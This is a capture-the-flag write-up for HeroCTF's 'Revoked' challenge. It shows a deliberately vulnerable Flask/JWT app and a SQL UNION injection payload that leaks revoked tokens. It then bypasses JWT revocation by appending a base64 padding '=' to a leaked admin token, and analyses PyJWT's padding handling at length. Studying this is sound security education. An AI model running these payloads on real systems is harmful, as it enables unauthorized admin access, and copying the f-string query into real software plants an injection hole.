HeroCTF v7 — Revoked (+ Revenge)
Your budget request for the new company personnel index has been declined. Instead, the intern has received a very small bonus in exchange for a homemade solution.
Show them their stinginess could cost them.
The chall maker forgot to remove a debug account... Here is the revenge challenge without this backdoor!
We're given a Python server that looks like this:
py
1import os
2import secrets
3import sqlite3
4import time
5from functools import wraps
6
7import bcrypt
8import jwt
9from dotenv import load_dotenv
10from flask import (
11 Flask,
12 flash,
13 jsonify,
14 make_response,
15 redirect,
16 render_template,
17 request,
18)
19
20app = Flask(__name__)
21app.static_folder = "static"
22load_dotenv()
23app.config["SECRET_KEY"] = "".join(
24 [secrets.choice("abcdef0123456789") for _ in range(32)]
25)
26FLAG = os.getenv("FLAG")
27
28
29def init_db():
30 conn = sqlite3.connect("database.db")
31 cursor = conn.cursor()
32 cursor.execute("""DROP TABLE IF EXISTS employees;""")
33 cursor.execute("""DROP TABLE IF EXISTS revoked_tokens;""")
34 cursor.execute("""DROP TABLE IF EXISTS users;""")
35 cursor.execute("""CREATE TABLE IF NOT EXISTS users (
36 id INTEGER PRIMARY KEY AUTOINCREMENT,
37 username TEXT UNIQUE NOT NULL,
38 is_admin BOOL NOT NULL,
39 password_hash TEXT NOT NULL)""")
40 cursor.execute("""CREATE TABLE IF NOT EXISTS revoked_tokens (
41 id INTEGER PRIMARY KEY AUTOINCREMENT,
42 token TEXT NOT NULL)""")
43 cursor.execute("""CREATE TABLE IF NOT EXISTS employees (
44 id INTEGER PRIMARY KEY AUTOINCREMENT,
45 name TEXT NOT NULL,
46 email TEXT UNIQUE NOT NULL,
47 position TEXT NOT NULL,
48 phone TEXT NOT NULL,
49 location TEXT NOT NULL)""")
50 conn.commit()
51 conn.close()
52
53
54def get_db_connection():
55 conn = sqlite3.connect("database.db")
56 conn.row_factory = sqlite3.Row
57 return conn
58
59
60def token_required(f):
61 @wraps(f)
62 def decorated(*args, **kwargs):
63 token = request.cookies.get("JWT")
64 if not token:
65 flash("Token is missing!", "error")
66 return redirect("/login")
67
68 try:
69 data = jwt.decode(token, app.config["SECRET_KEY"], algorithms=["HS256"])
70 username = data["username"]
71
72 conn = get_db_connection()
73 user = conn.execute(
74 "SELECT id,is_admin FROM users WHERE username = ?", (username,)
75 ).fetchone()
76 revoked = conn.execute(
77 "SELECT id FROM revoked_tokens WHERE token = ?", (token,)
78 ).fetchone()
79 conn.close()
80
81 if not user or revoked:
82 flash("Invalid or revoked token!", "error")
83 return redirect("/login")
84
85 request.is_admin = user["is_admin"]
86 request.username = username
87
88 except jwt.InvalidTokenError:
89 flash("Invalid token!", "error")
90 return redirect("/login")
91
92 return f(*args, **kwargs)
93
94 return decorated
95
96
97@app.route("/", methods=["GET"])
98def index():
99 token = request.cookies.get("JWT", None)
100 if token is None:
101 return redirect("/login")
102 else:
103 return redirect("/employees")
104
105
106@app.route("/register", methods=["GET", "POST"])
107def register():
108 if request.method == "GET":
109 return render_template("register.html")
110 elif request.method == "POST":
111 data = request.form
112 username = data.get("username")
113 password = data.get("password")
114
115 if not username or not password:
116 return jsonify({"message": "Username and password required!"}), 400
117
118 password_hash = bcrypt.hashpw(
119 password.encode("utf-8"), bcrypt.gensalt()
120 ).decode("utf-8")
121
122 conn = get_db_connection()
123 try:
124 conn.execute(
125 "INSERT INTO users (username, is_admin, password_hash) VALUES (?, ?, ?)",
126 (username, False, password_hash),
127 )
128 conn.commit()
129 except sqlite3.IntegrityError:
130 flash("User already exists.", "error")
131 return redirect("/register")
132 finally:
133 conn.close()
134
135 flash("User created successfully.", "success")
136 return redirect("/login")
137
138
139@app.route("/login", methods=["GET", "POST"])
140def login():
141 if request.method == "GET":
142 return render_template("login.html")
143 elif request.method == "POST":
144 data = request.form
145 username = data.get("username")
146 password = data.get("password")
147
148 conn = get_db_connection()
149 user = conn.execute(
150 "SELECT * FROM users WHERE username = ?", (username,)
151 ).fetchone()
152 conn.close()
153
154 if user and bcrypt.checkpw(
155 password.encode("utf-8"), user["password_hash"].encode("utf-8")
156 ):
157 token = jwt.encode(
158 {
159 "username": username,
160 "is_admin": user["is_admin"],
161 "issued": time.time(),
162 },
163 app.config["SECRET_KEY"],
164 algorithm="HS256",
165 )
166 resp = make_response(redirect("/employees"))
167 resp.set_cookie("JWT", token)
168 return resp
169
170 flash("Invalid credentials.", "error")
171 return redirect("/login")
172
173
174@app.route("/logout", methods=["GET"])
175def logout():
176 token = request.cookies.get("JWT")
177 if token:
178 conn = get_db_connection()
179 conn.execute("INSERT INTO revoked_tokens (token) VALUES (?)", (token,))
180 conn.commit()
181 conn.close()
182 resp = make_response(redirect("/login"))
183 resp.delete_cookie("JWT")
184 return resp
185
186
187@app.route("/employees", methods=["GET"])
188@token_required
189def employees():
190 query = request.args.get("query", "")
191 conn = get_db_connection()
192 cursor = conn.cursor()
193 cursor.execute(
194 f"SELECT id, name, email, position FROM employees WHERE name LIKE '%{query}%'"
195 )
196 results = cursor.fetchall()
197 conn.close()
198 print(request.username)
199 return render_template("employees.html", username=request.username, employees=results, query=query)
200
201
202@app.route("/employee/<int:employee_id>", methods=["GET"])
203@token_required
204def employee_details(employee_id):
205 conn = get_db_connection()
206 employee = conn.execute(
207 "SELECT * FROM employees WHERE id = ?", (employee_id,)
208 ).fetchone()
209 conn.close()
210 print(employee)
211 if not employee:
212 flash("Employee not found", "error")
213 return redirect("/employees")
214 return render_template("employee_details.html", username=request.username, employee=employee)
215
216
217@app.route("/admin", methods=["GET"])
218@token_required
219def admin():
220 is_admin = getattr(request, "is_admin", None)
221 if is_admin:
222 return render_template("admin.html", username=request.username, flag=FLAG)
223
224 flash("You don't have the permission to access this area", "error")
225 return redirect("/employees")
226
227
228if __name__ == "__main__":
229 init_db()
230 app.run(debug=False, host="0.0.0.0", port=5000)
We can see right off the bat that we have SQL injection in the /employees route:
py
1@app.route("/employees", methods=["GET"])
2@token_required
3def employees():
4 query = request.args.get("query", "")
5 conn = get_db_connection()
6 cursor = conn.cursor()
7 cursor.execute(
8 f"SELECT id, name, email, position FROM employees WHERE name LIKE '%{query}%'"
9 )
10 results = cursor.fetchall()
11 conn.close()
12 print(request.username)
13 return render_template("employees.html", username=request.username, employees=results, query=query)
We can then use UNION SELECT to leak any part of their database. But what's this about revoked tokens?
In their token_required decorator, we can see that our JWT is decoded and properties injected into the request object so long as:
- The JWT is valid.
- The `username` corresponds to an existing user.
- The token isn't in the `revoked_tokens` table.
py
1def token_required(f):
2 @wraps(f)
3 def decorated(*args, **kwargs):
4 token = request.cookies.get("JWT")
5 if not token:
6 flash("Token is missing!", "error")
7 return redirect("/login")
8
9 try:
10 data = jwt.decode(token, app.config["SECRET_KEY"], algorithms=["HS256"])
11 username = data["username"]
12
13 conn = get_db_connection()
14 user = conn.execute(
15 "SELECT id,is_admin FROM users WHERE username = ?", (username,)
16 ).fetchone()
17 revoked = conn.execute(
18 "SELECT id FROM revoked_tokens WHERE token = ?", (token,)
19 ).fetchone()
20 conn.close()
21
22 if not user or revoked:
23 flash("Invalid or revoked token!", "error")
24 return redirect("/login")
25
26 request.is_admin = user["is_admin"]
27 request.username = username
28
29 except jwt.InvalidTokenError:
30 flash("Invalid token!", "error")
31 return redirect("/login")
32
33 return f(*args, **kwargs)
34
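35 return decorated
So the main idea is this: we can leak the revoked_tokens table and (presumably) find an admin token there. Note that the revocation check compares the raw cookie string against the table, while the user lookup relies only on the decoded payload. If we can slightly perturb this token such that it is no longer exactly the same string as before (but it still decodes and verifies correctly), we can become admin and win!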
py
1@app.route("/admin", methods=["GET"])
2@token_required
3def admin():
4 is_admin = getattr(request, "is_admin", None)
5 if is_admin:
6 return render_template("admin.html", username=request.username, flag=FLAG)
7
8 flash("You don't have the permission to access this area", "error")
9 return redirect("/employees")
We can use our simple SQL injection to leak the revoked_tokens table,
Code (sql)
1a%'UNION SELECT id,token,token,token FROM revoked_tokens;--
and just check tokens until we find one corresponding to an admin. In this case:
Code
1eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaXNfYWRtaW4iOjEsImlzc3VlZCI6MTc2NDY0NjgzOC4zODE5NzgzfQ.5xEmNRYdgbWg77FWf3kPs28Ulcsqm_JimpCYymoCCCk
So how do we change this slightly to bypass the revoked_tokens check? What if we simply add an = to the end of it? (After all, = is a padding character in base64, and each part of the JWT is base64 encoded, right?)
Setting our JWT cookie to
Code
1eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaXNfYWRtaW4iOjEsImlzc3VlZCI6MTc2NDY0NjgzOC4zODE5NzgzfQ.5xEmNRYdgbWg77FWf3kPs28Ulcsqm_JimpCYymoCCCk=
we get the flag:
(this same solve works on both Revoked and Revoked Revenge, as we didn't rely on any shenanigans with any "debug accounts").
Why does this payload actually work? Indeed, if we tried to add an = to the JWT on jwt.io, we'd get the following error message:
The caveat is this: JWT segments aren't base64 encoded, they are base64url encoded. And, going by the MDN documentation:
A common variant of this definition allows only characters that are safe to use in filenames and URL values. This version, defined in RFC 4648, section 5, omits the padding and replaces `+` and `/` with `-` and `_`.
So if base64url omits the padding = characters, why did Python's jwt decode it anyways? I decided to read the PyJWT source to find out:
py
1 def decode(
2 self,
3 jwt: str | bytes,
4 key: AllowedPublicKeys | PyJWK | str | bytes = "",
5 algorithms: Sequence[str] | None = None,
6 options: Options | None = None,
7 # deprecated arg, remove in pyjwt3
8 verify: bool | None = None,
9 # could be used as passthrough to api_jws, consider removal in pyjwt3
10 detached_payload: bytes | None = None,
11 # passthrough arguments to _validate_claims
12 # consider putting in options
13 audience: str | Iterable[str] | None = None,
14 subject: str | None = None,
15 issuer: str | Container[str] | None = None,
16 leeway: float | timedelta = 0,
17 # kwargs
18 **kwargs: Any,
19 ) -> dict[str, Any]:
20 """
21 ...
22 """
23 if kwargs:
24 warnings.warn(
25 "passing additional kwargs to decode() is deprecated "
26 "and will be removed in pyjwt version 3. "
27 f"Unsupported kwargs: {tuple(kwargs.keys())}",
28 RemovedInPyjwt3Warning,
29 stacklevel=2,
30 )
31 decoded = self.decode_complete(
32 jwt,
33 key,
34 algorithms,
35 options,
36 verify=verify,
37 detached_payload=detached_payload,
38 audience=audience,
39 subject=subject,
40 issuer=issuer,
41 leeway=leeway,
42 )
43 return decoded["payload"]
Seemingly, decode(...) just calls decode_complete(...):
py
1 def decode_complete(
2 self,
3 jwt: str | bytes,
4 key: AllowedPublicKeyTypes = "",
5 algorithms: Sequence[str] | None = None,
6 options: Options | None = None,
7 # deprecated arg, remove in pyjwt3
8 verify: bool | None = None,
9 # could be used as passthrough to api_jws, consider removal in pyjwt3
10 detached_payload: bytes | None = None,
11 # passthrough arguments to _validate_claims
12 # consider putting in options
13 audience: str | Iterable[str] | None = None,
14 issuer: str | Container[str] | None = None,
15 subject: str | None = None,
16 leeway: float | timedelta = 0,
17 # kwargs
18 **kwargs: Any,
19 ) -> dict[str, Any]:
20 """
21 ...
22 """
23 if kwargs:
24 warnings.warn(
25 "passing additional kwargs to decode_complete() is deprecated "
26 "and will be removed in pyjwt version 3. "
27 f"Unsupported kwargs: {tuple(kwargs.keys())}",
28 RemovedInPyjwt3Warning,
29 stacklevel=2,
30 )
31
32 if options is None:
33 verify_signature = True
34 else:
35 verify_signature = options.get("verify_signature", True)
36
37 # If the user has set the legacy `verify` argument, and it doesn't match
38 # what the relevant `options` entry for the argument is, inform the user
39 # that they're likely making a mistake.
40 if verify is not None and verify != verify_signature:
41 warnings.warn(
42 "The `verify` argument to `decode` does nothing in PyJWT 2.0 and newer. "
43 "The equivalent is setting `verify_signature` to False in the `options` dictionary. "
44 "This invocation has a mismatch between the kwarg and the option entry.",
45 category=DeprecationWarning,
46 stacklevel=2,
47 )
48
49 sig_options: SigOptions = {"verify_signature": verify_signature}
50 decoded = api_jws.decode_complete(
51 jwt,
52 key=key,
53 algorithms=algorithms,
54 options=sig_options,
55 detached_payload=detached_payload,
56 )
57
58 payload = self._decode_payload(decoded)
59
60 merged_options = self._merge_options(options)
61 self._validate_claims(
62 payload,
63 merged_options,
64 audience=audience,
65 issuer=issuer,
66 leeway=leeway,
67 subject=subject,
68 )
69
70 decoded["payload"] = payload
71 return decoded
and in decode_complete(), the decoding of the JWT string is handled by api_jws.decode_complete(...):
py
1 def decode_complete(
2 self,
3 jwt: str | bytes,
4 key: AllowedPublicKeys | PyJWK | str | bytes = "",
5 algorithms: Sequence[str] | None = None,
6 options: SigOptions | None = None,
7 detached_payload: bytes | None = None,
8 **kwargs: dict[str, Any],
9 ) -> dict[str, Any]:
10 if kwargs:
11 warnings.warn(
12 "passing additional kwargs to decode_complete() is deprecated "
13 "and will be removed in pyjwt version 3. "
14 f"Unsupported kwargs: {tuple(kwargs.keys())}",
15 RemovedInPyjwt3Warning,
16 stacklevel=2,
17 )
18 merged_options: SigOptions
19 if options is None:
20 merged_options = self.options
21 else:
22 merged_options = {**self.options, **options}
23
24 verify_signature = merged_options["verify_signature"]
25
26 if verify_signature and not algorithms and not isinstance(key, PyJWK):
27 raise DecodeError(
28 'It is required that you pass in a value for the "algorithms" argument when calling decode().'
29 )
30
31 payload, signing_input, header, signature = self._load(jwt)
32
33 if header.get("b64", True) is False:
34 if detached_payload is None:
35 raise DecodeError(
36 'It is required that you pass in a value for the "detached_payload" argument to decode a message having the b64 header set to false.'
37 )
38 payload = detached_payload
39 signing_input = b".".join([signing_input.rsplit(b".", 1)[0], payload])
40
41 if verify_signature:
42 self._verify_signature(signing_input, header, signature, key, algorithms)
43
44 return {
45 "payload": payload,
46 "header": header,
47 "signature": signature,
48 }
which calls _load(...):
py
1 def _load(self, jwt: str | bytes) -> tuple[bytes, bytes, dict[str, Any], bytes]:
2 if isinstance(jwt, str):
3 jwt = jwt.encode("utf-8")
4
5 if not isinstance(jwt, bytes):
6 raise DecodeError(f"Invalid token type. Token must be a {bytes}")
7
8 try:
9 signing_input, crypto_segment = jwt.rsplit(b".", 1)
10 header_segment, payload_segment = signing_input.split(b".", 1)
11 except ValueError as err:
12 raise DecodeError("Not enough segments") from err
13
14 try:
15 header_data = base64url_decode(header_segment)
16 except (TypeError, binascii.Error) as err:
17 raise DecodeError("Invalid header padding") from err
18
19 try:
20 header: dict[str, Any] = json.loads(header_data)
21 except ValueError as e:
22 raise DecodeError(f"Invalid header string: {e}") from e
23
24 if not isinstance(header, dict):
25 raise DecodeError("Invalid header string: must be a json object")
26
27 try:
28 payload = base64url_decode(payload_segment)
29 except (TypeError, binascii.Error) as err:
30 raise DecodeError("Invalid payload padding") from err
31
32 try:
33 signature = base64url_decode(crypto_segment)
34 except (TypeError, binascii.Error) as err:
35 raise DecodeError("Invalid crypto padding") from err
36
37 return (payload, signing_input, header, signature)
which finally calls base64url_decode(...):
py
1def base64url_decode(input: Union[bytes, str]) -> bytes:
2 input_bytes = force_bytes(input)
3
4 rem = len(input_bytes) % 4
5
6 if rem > 0:
7 input_bytes += b"=" * (4 - rem)
8
9 return base64.urlsafe_b64decode(input_bytes)
10
11
12def base64url_encode(input: bytes) -> bytes:
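13 return base64.urlsafe_b64encode(input).replace(b"=", b"")
which, apart from re-adding any missing padding to our input, just hands off to the Python standard library's base64.urlsafe_b64decode(). In our case the signature segment is 43 characters long, so appending a single = brings it to 44: rem is 0, no extra padding is added, and the segment decodes to the same signature bytes as before. The signing input (everything before the last dot) is untouched, so the signature still verifies. Surprisingly, the documentation for base64.urlsafe_b64decode() makes no mention of omitting padding characters!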
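Finally, what does the RFC say? According to the linked RFC 4648 section 5, the pad character = is typically percent-encoded when used in a URI, but if the data length is known implicitly, this can be avoided by skipping the padding (see section 3.2 of the same RFC),
so padding characters can be skipped? Sometimes?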
And the padding issue seemingly isn't just an MDN misunderstanding either; if you google "base64 URL encoder", many sites (including the somewhat well-known base64encode.org, but also the third result on google, this npm library, and this random Medium article I came across) will omit padding characters when encoding base64url:
But others, including the first result that happened to come up on google, don't.
py
1>>> base64.urlsafe_b64encode(b'aaaaaaa')
2b'YWFhYWFhYQ=='
Hell, even the C# standard library for ASP.NET seems to drop padding characters when encoding:
Code (cs)
1 public static int Base64UrlEncode(byte[] input, int offset, char[] output, int outputOffset, int count)
2 {
3 ArgumentNullThrowHelper.ThrowIfNull(input);
4 ArgumentNullThrowHelper.ThrowIfNull(output);
5
6 ValidateParameters(input.Length, nameof(input), offset, count);
7 ArgumentOutOfRangeThrowHelper.ThrowIfNegative(outputOffset);
8
9 var arraySizeRequired = GetArraySizeRequiredToEncode(count);
10 if (output.Length - outputOffset < arraySizeRequired)
11 {
12 throw new ArgumentException(
13 string.Format(
14 CultureInfo.CurrentCulture,
15 EncoderResources.WebEncoders_InvalidCountOffsetOrLength,
16 nameof(count),
17 nameof(outputOffset),
18 nameof(output)),
19 nameof(count));
20 }
21
22#if NETCOREAPP
23 return Base64UrlEncode(input.AsSpan(offset, count), output.AsSpan(outputOffset));
24#else
25 // Special-case empty input.
26 if (count == 0)
27 {
28 return 0;
29 }
30
31 // Use base64url encoding with no padding characters. See RFC 4648, Sec. 5.
32
33 // Start with default Base64 encoding.
34 var numBase64Chars = Convert.ToBase64CharArray(input, offset, count, output, outputOffset);
35
36 // Fix up '+' -> '-' and '/' -> '_'. Drop padding characters.
37 for (var i = outputOffset; i - outputOffset < numBase64Chars; i++)
38 {
39 var ch = output[i];
40 if (ch == '+')
41 {
42 output[i] = '-';
43 }
44 else if (ch == '/')
45 {
46 output[i] = '_';
47 }
48 else if (ch == '=')
49 {
50 // We've reached a padding character; truncate the remainder.
51 return i - outputOffset;
52 }
53 }
54
55 return numBase64Chars;
56#endif
57 }
(In C#'s Base64UrlDecode, a comment says to assume that the input contains no padding characters, though at first glance the method appears to work even if padding exists.)
All this to say, I think it's a bit strange that there's so much differing behavior around this spec.